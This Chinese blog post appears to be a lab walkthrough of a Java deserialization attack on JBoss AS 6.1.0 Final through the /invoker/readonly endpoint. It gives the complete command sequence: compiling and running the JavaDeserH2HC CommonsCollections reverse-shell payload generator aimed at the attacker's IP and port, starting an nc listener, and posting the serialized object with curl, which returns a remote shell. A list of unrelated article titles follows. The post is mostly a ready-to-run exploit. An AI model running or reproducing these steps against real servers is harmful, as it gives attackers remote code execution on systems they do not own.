本机IP:192.168.220.145

靶机IP:192.168.220.139,版本为JBOSS AS 6.1.0 Final

首先访问目标地址,http://192.168.220.139:8080/invoker/readonly

返回500,一般存在

执行命令

┌─[root@sch01ar]─[~]
└──╼ #cd /sch01ar/JavaDeserH2HC/
┌─[root@sch01ar]─[/sch01ar/JavaDeserH2HC]
└──╼ #javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
┌─[root@sch01ar]─[/sch01ar/JavaDeserH2HC]
└──╼ #java -cp .:commons-collections-3.2.1.jar  ReverseShellCommonsCollectionsHashMap 192.168.220.145:4444
Saving serialized object in ReverseShellCommonsCollectionsHashMap.ser

生成了一个ReverseShellCommonsCollectionsHashMap.ser文件

用nc监听4444端口

┌─[✗]─[root@sch01ar]─[~]
└──╼ #nc -vlp 4444

发送payload

┌─[root@sch01ar]─[/sch01ar/JavaDeserH2HC]
└──╼ #curl http://192.168.220.139:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

nc成功返回shell

最新文章

  1. Zookeeper-Zookeeper启动过程
  2. 本机搭建zookeeper集群
  3. 微课程--Android--Android概述
  4. kafka模拟客户端发送、接受消息
  5. 要件审判九步法及其基本价值 z
  6. Android:PopupWindow简单弹窗改进版
  7. bnuoj 29368 Check the Identity(栈)
  8. 图片左右循环连续滚动代码,解决marquee的留白问题
  9. [转]Jquery中AJAX错误信息调试参考
  10. PHP学习(变量)
  11. [置顶] 如何使用c3p0+spring连接oracle数据库
  12. 应用facebook .net sdk
  13. 如何面试 PHP 工程师?
  14. Springboot整合activemq
  15. 008. 阻塞&非阻塞、同步&异步
  16. 小程序之 input框设置placeholder的style
  17. 使用vue-cli 引入bootstrap.min.css文件报错
  18. Yii2 查询构建器 QueryBuilder
  19. VUE温习:style层次分析
  20. (转)MySQL排序原理与案例分析

热门文章

  1. Linux修改网络配置
  2. windows环境下JDK1.8安装
  3. 模仿jquery框架源码---网络
  4. iOS UILabel 省略号 不变色 问题处理
  5. React Native 列表的总结
  6. Android系统OTA升级包制作【转】
  7. Charles进行HTTPS抓包(iOS为例)
  8. bzoj 1579: [Usaco2009 Feb]Revamping Trails 道路升级 优先队列+dij
  9. Hive- Hive 按时间定期插入分区表
  10. jquery带下拉菜单和焦点图